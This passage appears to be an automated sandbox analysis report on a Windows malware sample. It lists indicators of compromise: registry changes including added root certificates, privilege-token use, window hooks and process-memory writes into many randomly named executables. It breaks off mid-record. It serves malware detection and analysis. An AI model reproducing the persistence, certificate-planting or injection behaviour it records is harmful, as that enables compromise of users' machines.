Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d71b7c9c5fc7d701 msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 40caa1ee5fc7d701 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{U9IGI0Q2-B7HR-SAI9-Z61V-J0SY8EIASHJB}\650478DC7424C37C svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe -
Processes:
installer.exeFri051e1e7444.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Fri051e1e7444.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 533 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 546 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri051e1e7444.exegckOBeKwEc_9Tb1WLDr_o55o.exepid process 1336 Fri051e1e7444.exe 1336 Fri051e1e7444.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe 3816 gckOBeKwEc_9Tb1WLDr_o55o.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2540 -
Suspicious behavior: MapViewOfSection 13 IoCs
Processes:
CObebYmiTdY_PuwpkFiVDpKe.exe8A71.exeHpQtObz62dT6szj1j12odrbQ.exeF190.exeuiusvrrbfusvrrbwusvrrMicrosoftEdgeCP.exepid process 700 CObebYmiTdY_PuwpkFiVDpKe.exe 2164 8A71.exe 2628 HpQtObz62dT6szj1j12odrbQ.exe 5812 F190.exe 4388 uiusvrr 8148 bfusvrr 8908 bwusvrr 8176 MicrosoftEdgeCP.exe 8176 MicrosoftEdgeCP.exe 8176 MicrosoftEdgeCP.exe 8176 MicrosoftEdgeCP.exe 8176 MicrosoftEdgeCP.exe 8176 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
6RfiwzZkIPJvopWxqd4ouGmM.exeWerFault.exedescription pid process Token: SeCreateTokenPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeAssignPrimaryTokenPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeLockMemoryPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeIncreaseQuotaPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeMachineAccountPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeTcbPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeSecurityPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeTakeOwnershipPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeLoadDriverPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeSystemProfilePrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeSystemtimePrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeProfSingleProcessPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeIncBasePriorityPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeCreatePagefilePrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeCreatePermanentPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeBackupPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeRestorePrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeShutdownPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeDebugPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeAuditPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeSystemEnvironmentPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeChangeNotifyPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeRemoteShutdownPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeUndockPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeSyncAgentPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeEnableDelegationPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeManageVolumePrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeImpersonatePrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeCreateGlobalPrivilege 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: 31 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: 32 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: 33 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: 34 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: 35 2332 6RfiwzZkIPJvopWxqd4ouGmM.exe Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeRestorePrivilege 2288 WerFault.exe Token: SeBackupPrivilege 2288 WerFault.exe Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeDebugPrivilege 2288 WerFault.exe Token: SeShutdownPrivilege 2540 Token: SeCreatePagefilePrivilege 2540 Token: SeShutdownPrivilege 2540 -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
installer.exeCalculator.exepid process 2540 2540 6148 installer.exe 2540 2540 5552 Calculator.exe 2540 2540 -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
MicrosoftEdge.execmd.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exepid process 2540 5488 MicrosoftEdge.exe 7160 cmd.exe 8584 msiexec.exe 8344 MicrosoftEdgeCP.exe 8176 MicrosoftEdgeCP.exe 8176 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Fri051e1e7444.exeCObebYmiTdY_PuwpkFiVDpKe.exeUv2OLZQGQUISQFphMrVjFyks.exeuIhpaXRSRc02XMvQzI27rw3i.exedescription pid process target process PID 1336 wrote to memory of 3816 1336 Fri051e1e7444.exe gckOBeKwEc_9Tb1WLDr_o55o.exe PID 1336 wrote to memory of 3816 1336 Fri051e1e7444.exe gckOBeKwEc_9Tb1WLDr_o55o.exe PID 1336 wrote to memory of 2760 1336 Fri051e1e7444.exe NpQFFR5PLBhAmQZ0HxCbwNxm.exe PID 1336 wrote to memory of 2760 1336 Fri051e1e7444.exe NpQFFR5PLBhAmQZ0HxCbwNxm.exe PID 1336 wrote to memory of 2760 1336 Fri051e1e7444.exe NpQFFR5PLBhAmQZ0HxCbwNxm.exe PID 1336 wrote to memory of 1316 1336 Fri051e1e7444.exe ADP8vL2SLdGPH8L7FyA9nk0u.exe PID 1336 wrote to memory of 1316 1336 Fri051e1e7444.exe ADP8vL2SLdGPH8L7FyA9nk0u.exe PID 1336 wrote to memory of 1316 1336 Fri051e1e7444.exe ADP8vL2SLdGPH8L7FyA9nk0u.exe PID 1336 wrote to memory of 2332 